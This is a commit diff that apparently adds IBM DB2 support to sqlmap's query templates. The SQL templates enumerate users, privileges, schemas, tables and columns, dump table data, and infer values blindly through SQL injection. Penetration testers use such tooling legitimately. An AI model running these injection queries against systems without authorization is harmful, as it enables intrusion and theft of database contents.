applying contributed patch for DB2

2025-12-15 20:29:04 +00:00 · 2011-05-06 09:30:39 +00:00
parent 2d8408c885
commit 6e392b6054
17 changed files with 505 additions and 30 deletions
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -540,4 +540,71 @@
            <blind/>
        </search_column>
    </dbms>
+
+    <!-- IBM DB2 -->
+    <dbms value="IBM DB2">
+        <cast query="RTRIM(CAST(%s AS CHAR(254)))"/>
+        <length query="LENGTH(RTRIM(CAST(%s AS CHAR(254))))"/>
+        <isnull query="COALESCE(%s,' ')"/>
+        <delimiter query="||"/>
+        <limit query="ROW_NUMBER() OVER () AS LIMIT %s) AS foobar WHERE LIMIT"/>
+        <limitregexp query="ROW_NUMBER\(\)\s+OVER\s+\(\)\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+"/>
+        <limitgroupstart/>
+        <limitgroupstop/>
+        <limitstring/>
+        <order query="ORDER BY %s ASC"/>
+        <count query="COUNT(%s)"/>
+        <comment query="--"/>
+        <!-- todo: timedelay -->
+        <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
+        <substring query="SUBSTR((%s),%d,%d)"/>
+        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM sysibm.sysdummy1"/>
+        <!-- ASCII() not supported in all versions -->
+        <inference query="ASCII(SUBSTR((%s),%d,1)) > %d"/>
+        <!-- we have to use the complicated UDB OLAP functions in query2 because sqlmap injects isnull query inside MAX function, else we'd use: SELECT MAX(versionnumber) FROM sysibm.sysversions -->
+        <banner query="SELECT service_level FROM TABLE (sysproc.env_get_inst_info())" query2="SELECT versionnumber FROM (SELECT ROW_NUMBER() OVER (ORDER BY versionnumber DESC) AS LIMIT, versionnumber FROM sysibm.sysversions) AS foobar WHERE LIMIT=1"/>
+        <current_user query="SELECT user FROM sysibm.sysdummy1"/>
+        <current_db query="SELECT current server FROM sysibm.sysdummy1"/>
+        <is_dba query="(SELECT dbadmauth FROM syscat.dbauth WHERE grantee=current user)='Y'"/>
+        <users>
+            <inband query="SELECT DISTINCT(grantee) FROM sysibm.sysdbauth"/>
+            <blind query="SELECT grantee FROM (SELECT ROW_NUMBER() OVER () AS LIMIT, grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC') AS foobar WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(grantee)) FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
+        </users>
+        <!-- On DB2 it is not possible to list password hashes, since they are handled by the OS -->        
+        <passwords/>
+        <privileges>
+            <inband query="SELECT grantee,privilege FROM dba_sys_privs" query2="SELECT username,privilege FROM user_sys_privs" condition="grantee" condition2="username"/>
+            <blind query="SELECT tabschema||'.'||tabname||CHR(44)||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS LIMIT, syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS foobar WHERE LIMIT=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
+        </privileges>
+        <roles/>
+        <!-- NOTE: in DB2 schema names are the counterpart to database names on other DBMSes -->
+        <dbs>
+            <inband query="SELECT schemaname FROM syscat.schemata"/>
+            <blind query="SELECT schemaname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT, schemaname FROM syscat.schemata) AS foobar WHERE LIMIT=%d" count="SELECT COUNT(schemaname) FROM syscat.schemata"/>
+        </dbs>
+        <tables>
+            <inband query="SELECT tabname FROM sysstat.tables" condition="tabschema"/>
+            <blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT, tabname FROM sysstat.tables WHERE tabschema='%s') AS foobar WHERE LIMIT=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
+        </tables>
+        <columns>
+            <inband query="SELECT name FROM sysibm.syscolumns WHERE tbname='%s'" condition="name"/>
+            <blind query="SELECT name FROM sysibm.syscolumns WHERE tbname='%s'" query2="SELECT RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND name='%s'" count="SELECT COUNT(name) FROM sysibm.syscolumns WHERE tbname='%s'" condition="name"/>
+        </columns>
+        <dump_table>
+            <inband query="SELECT %s FROM %s"/>
+            <blind query="SELECT %s FROM (SELECT ROW_NUMBER() OVER () AS LIMIT, %s FROM %s) AS foobar WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
+        </dump_table>
+        <search_db>
+            <inband query="SELECT schemaname FROM syscat.schemata WHERE " query2="" condition="schemaname" condition2=""/>
+            <blind query="SELECT schemaname FROM (SELECT DISTINCT(schemaname) FROM syscat.schemata WHERE " query2="" count="SELECT COUNT(DISTINCT(schemaname)) FROM syscat.schemata WHERE " count2="" condition="schemaname" condition2=""/>        
+        </search_db>
+        <search_table>
+            <inband query="SELECT tabschema, tabname FROM sysstat.tables WHERE " condition="tabname" condition2="tabschema"/>
+            <blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.tables WHERE " query2="SELECT DISTINCT(tabname) FROM sysstat.tables WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.tables WHERE " count2="SELECT COUNT(tabname) FROM sysstat.tables WHERE tabschema='%s'" condition="tabname" condition2="tabschema"/>
+        </search_table>
+        <search_column>
+            <inband query="SELECT tabschema, tabname FROM sysstat.columns WHERE " condition="colname" condition2="tabschema"/>
+            <blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.columns WHERE " query2="SELECT DISTINCT(tabname) FROM sysstat.columns WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.columns WHERE " count2="SELECT COUNT(DISTINCT(tabname)) FROM sysstat.columns WHERE tabschema='%s'" condition="colname" condition2="tabschema"/>
+        </search_column>
+    </dbms>
 </root>